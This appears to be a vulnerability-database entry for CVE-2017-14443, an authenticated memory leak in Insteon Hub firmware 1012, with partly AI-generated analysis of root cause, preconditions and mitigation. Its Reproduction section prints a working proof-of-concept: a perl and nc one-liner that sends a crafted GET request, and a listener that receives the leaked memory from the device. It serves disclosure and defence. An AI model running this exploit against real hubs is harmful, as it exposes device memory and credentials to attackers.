CVE-2017-14443
Description
An exploitable information leak vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly checks the number of GET parameters supplied, leading to an arbitrarily controlled information leak on the whole device memory. An attacker can send an authenticated HTTP request to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Insteon Hub firmware 1012 leaks arbitrary memory via HTTP GET requests with improperly checked parameter count, requiring authentication.
Vulnerability
The Insteon Hub (model 2245-222) running firmware version 1012 contains an information leak vulnerability in its HTTP server implementation. The server uses the HTTPServer task from Microchip's Libraries for Applications, which calls an HTTPExecuteGet function when handling HTTP GET requests. The function fails to correctly validate the number of GET parameters supplied, leading to an out-of-bounds read from the curHTTP structure (HTTP_CONN type). An attacker can trigger this bug via a specially crafted HTTP GET request that specifies an invalid number of parameters [1].
Exploitation
An attacker must have authenticated access to the Insteon Hub to send HTTP requests. The vulnerability is remotely exploitable over the network with low attack complexity (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:H). No user interaction is required beyond the attacker's own actions. To exploit, the attacker sends an HTTP GET request with a manipulated number of parameters, causing the server to read beyond the bounds of the parameter array and leak arbitrary memory contents [1].
Impact
Successful exploitation results in an arbitrary memory leak from the target device. The attacker can read any portion of the device's memory, potentially exposing sensitive data such as credentials, configuration details, or other secrets stored in RAM. The CVSS score of 9.6 indicates a critical impact on confidentiality and availability. The leaked information may enable further attacks or unauthorized control of the hub [1].
Mitigation
As of the publication date of TALOS-2017-0492 (September 2018), no official patch or firmware update has been released to address this vulnerability in Insteon Hub firmware version 1012. Users are advised to restrict network access to the hub to trusted users only and monitor for any future firmware updates from Insteon. The Hub may be at end-of-life, and no fix is guaranteed [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: =1012
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Uninitialized variable: the code reads GET parameter 4 from the stack without verifying it was parsed, allowing an attacker to control the pointer via request padding and leak arbitrary memory."
Attack vector
An attacker must first authenticate via HTTP Basic Authentication (the advisory notes that `HTTPExecuteGet` is only reached if a valid basic-auth string is provided). The attacker sends a crafted GET request with at least 3 parameters where parameter 3 is "1" and parameter 1 starts with "u" (e.g., "up_PLM"). Because the code checks only that there are at least 3 parameters [5] but then reads parameter 4 from the stack without initializing it, the fourth parameter pointer is uninitialized. By padding the HTTP request with extra bytes (0x68 bytes of 'A') and appending a controlled 4-byte address, the attacker can overwrite the uninitialized stack slot to point to any arbitrary memory location. The device then performs an outbound HTTP GET to the attacker-controlled host, leaking the NULL-terminated string at that address [ref_id=1].
Affected code
The vulnerability resides in the `insteon_HTTPExecuteGet` function (at seg000:9D02C758) within the HTTPServer task of Microchip's "Libraries for Applications". The function calls `sub_9d043e0c` to parse GET parameters into a local array of pointers, then checks the parameter count at [5] and processes parameters at [6] and [7]. The flaw is that when fewer than 4 parameters are supplied, parameter 4 (`getparam_4`) is never initialized but is still used as the source argument to `strcpy` at [10], copying an uninitialized pointer's target into the global update URL variable.
What the fix does
The advisory does not include a patch or describe a specific fix. The remediation guidance is implicit in the vulnerability description: the `insteon_HTTPExecuteGet` function must validate that all four GET parameters are actually present before dereferencing them. Specifically, the check at [5] (`sltiu $s2, 3`) only ensures at least 3 parameters exist, but the code at [10] uses parameter 4 without verifying it was parsed. A proper fix would either require exactly 4 parameters for this code path or initialize all parameter pointers to a safe default before use, preventing the uninitialized variable condition [CWE-457] [ref_id=1].
Preconditions
- authAttacker must provide valid HTTP Basic Authentication credentials (the advisory states HTTPExecuteGet is only reached if a valid basic-auth string is provided)
- networkAttacker must have network access to the Insteon Hub on port 25105
- networkAttacker must control a server reachable by the device to receive the leaked data
- inputGET request must contain at least 3 parameters with specific values (parameter 3 = '1', parameter 1 starts with 'u')
Reproduction
The advisory provides a working PoC. Set `sMyIP` to the attacker's IP, then run: `perl -e 'print "GET /x?up_PLM&${sMyIP}&1& HTTP/1.0\r\nAuthorization: Basic VXNlcm5hbWU6UGFzc3dvcmQ=\r\n" . "A"x68 . "\x30\xb1\x06\x9d" . "\r\n\r\n"' | nc $INSTEON_IP 25105`. Simultaneously listen on port 80 with `nc -l -p 80`. The device will connect back and send the string at address 0x9d061b30 (e.g., "600") in the HTTP request path [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2017-0492mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.